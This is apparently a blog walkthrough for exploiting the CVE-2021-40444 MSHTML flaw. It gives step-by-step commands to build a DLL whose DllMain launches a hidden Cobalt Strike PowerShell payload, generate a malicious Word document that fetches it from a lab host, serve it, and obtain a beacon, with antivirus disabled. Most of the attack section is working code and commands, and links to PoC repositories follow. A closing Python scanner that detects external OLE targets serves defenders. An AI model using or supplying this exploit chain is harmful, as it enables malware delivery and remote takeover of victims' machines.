Previous post:
CVE-2021-40444 MSHTML component vulnerability | with: implementation process
Install the cross-compiler toolchain:
sudo apt-get install gcc-mingw-w64
Start the CS (Cobalt Strike) client and team server, then generate the payload:
powershell -nop -w hidden -encodedcommand .....(omitted)
Write the source file (calc.c). The DLL runs the generated PowerShell command from DllMain as soon as the library is loaded into the process:
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Launches the CS payload; the encoded command is omitted here as in the original. */
void exec(void) {
    system("powershell -nop -w hidden -encodedcommand .....(omitted)");
    return;
}

BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
    case DLL_PROCESS_ATTACH:
        /* Runs once, when the DLL is first mapped into the process. */
        exec();
        break;

    case DLL_THREAD_ATTACH:
        break;

    case DLL_THREAD_DETACH:
        break;

    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
Compile it into a DLL:
i686-w64-mingw32-gcc -shared calc.c -o calc.dll
Generate the malicious document:
python3 exploit.py generate test/calc.dll http://192.168.226.128
Start the server that hosts the payload:
sudo python3 exploit.py host 80
Open the generated malicious document inside the VM; the beacon checks in successfully.
ActiveX must be enabled in the IE browser.
Note that antivirus must be disabled.
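The document produced by the generate step above carries an OLE object whose package relationship points at an external URL (the mhtml:http://... form this CVE abuses) rather than at an embedded part. As an added defender-side check, not part of the original post or of the referenced PoC, the following Python script opens a .docx as a zip, parses every .rels part, and reports any oleObject relationship that is marked External and targets an http, https or mhtml URL. The sample document it builds is constructed inline for the demonstration; the relationship type and namespace URIs are the standard Office Open XML ones, and the host 192.168.226.128 is taken from the steps above.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Standard Office Open XML relationship namespace and oleObject relationship type.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# Schemes that should never appear as the target of an OLE object in a benign document.
SUSPICIOUS_SCHEMES = ("mhtml:", "http:", "https:")


def find_external_ole_targets(docx_bytes):
    """Return [(rels_part, rel_id, target)] for every external oleObject relationship
    whose target uses one of SUSPICIOUS_SCHEMES. An empty list means nothing was flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue  # malformed part: not our concern here, skip it
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                # Internal targets point at an embedded part (e.g. embeddings/oleObject1.bin).
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                target = rel.get("Target", "")
                if target.lower().startswith(SUSPICIOUS_SCHEMES):
                    findings.append((name, rel.get("Id"), target))
    return findings


def make_sample_docx(ole_target, external=True):
    """Build a minimal, constructed .docx-style zip containing one oleObject relationship.
    This is test scaffolding, not a real document produced by the PoC."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<Relationships xmlns="{RELS_NS}">'
        f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" Target="{ole_target}"{mode}/>'
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


# Constructed sample: the mhtml:...!x-usc:... target shape seen in CVE-2021-40444 documents.
MALICIOUS_TARGET = ("mhtml:http://192.168.226.128/payload.html"
                    "!x-usc:http://192.168.226.128/payload.html")

if __name__ == "__main__":
    for label, doc in (("malicious", make_sample_docx(MALICIOUS_TARGET)),
                       ("benign", make_sample_docx("embeddings/oleObject1.bin", external=False))):
        print(label, find_external_ole_targets(doc))
```

To scan a real file, pass `open(path, "rb").read()` to `find_external_ole_targets`; any non-empty result is worth quarantining and reviewing, since a legitimate embedded OLE object is stored as an internal part, not fetched from a remote URL.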
https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
https://github.com/rfcxv/CVE-2021-40444-POC
https://mp.weixin.qq.com/s/hjjLKQCiaVUKWOw1jzQE9A